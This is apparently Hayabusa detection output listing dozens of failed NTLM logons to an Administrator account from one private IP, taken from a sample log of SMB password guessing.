2016-09-20 01:51:00.001 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Vi7Moaa6d12CzWhl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.048 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4fbbRVOig9bn9p5g  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.079 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qSZrfRe9d0LLkbmA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QqdZMYsbXFlrKFxk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.152 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kypdxj88trEUBEny  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9hM8fge1IrNsJNd2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SzG27JSj6iAFyiNT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.269 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hWcjuW8dU5ATLHzB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.304 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ns9lm9Nvhvi4fY6A  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.353 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aExdYPqY2eUCYZmC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.389 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: t9cnmRGdByuJlKZj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: f9RvWTFFUgCrhlkD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.480 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HC3oQUIEWqztyx6s  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TK3BOeD2w9xPB4N1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: I6yzU5WuvpmPKLSS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GFoUGsara5Pl03WP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.634 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qLaOCImeMIMlGvMj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.761 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2Vzb3pEI2ZeP2NFA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.821 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7Fa7ebH7UXd1KW4X  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wRBHXRkOa6x5KI5G  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.915 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VNVxzgOLrZzfP3cB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.944 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yCNXajRX2lIgLQuc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.992 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: x0nukf24IoalycOn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.101 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xZFZN0KfeHtyDppG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.144 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZmxqKyWU5GU1y22P  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WuRyvCfgQ4rwG3fu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3prKZt5ymouwNKnK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.264 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CWrNNn13EC1FLwLA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.308 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SfnBT5OvT5cQXHfS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RLZFPCShXoPvvThS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.388 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UsPCJ0UlfH4urYrm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MIQlOetFByLZqPkT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: c9IBZ0qTDlHWADZt  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.491 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lmhkB39gKvvuT89e  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.536 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4KPoZ8JB7WSjUCHW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0mwiPq4gF1YXkQSl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.615 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Y5ncgrpwOFo7E8vg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.647 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KbkG8ezrAPFC0iKu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GW4WKkHocNadDzrb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.732 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: unbtFAiykcfKTbQT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: oRzF1s9XVoRmoFQ6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9TO1c7eYd1IQHVwG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.852 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Wsn5GM4BqEl6A6pY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.900 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pq350wqwVDQlTKu9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: uMJWwjG7J2sOiBYd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.984 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3YusfxQQygi2x5Cu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.024 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6q29uj6ovfwz0riC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.072 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cj38VsqGLoQ8jGdf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TOW8OIO2vQRFaTID  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.173 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DfYITdZCYwEj9IJV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.205 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4BI6V35tZGZ1WGtJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wOF75n4aunKH9qxc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jsTFTCnFFBkhG5jP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5qiwcKE2TQui2H8z  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PZOCyXplWOCyKbFm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.416 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RhyaAhYB78nbh1Ig  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.462 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MIJU9xbr1klIvvdE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.506 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qLKVR3mW3g3utO4X  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aNm4tVG8bV7e9gbB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JtU0PCr9K5DXFYV2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.622 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CH3BWNPEWlw52Gb6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vQTYqFKBz6YEWhF6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.708 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qkj3u8ODgLD7xQ5R  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.758 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: r9uyze1uO0zuNNUM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.803 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UmL15i3edXHcUamI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.840 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: x7xjFRjv9rDhiXJ6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.880 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6BmQhVEv8g7EKu1F  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: upOMmG87cDO1NFg0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.963 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tO55KfkORhxFORvF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: D64wDbqkqmzWuUSa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sIDgNIlGA0cOkBOI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.082 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: i0kXPQ6s7CGe4QGA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
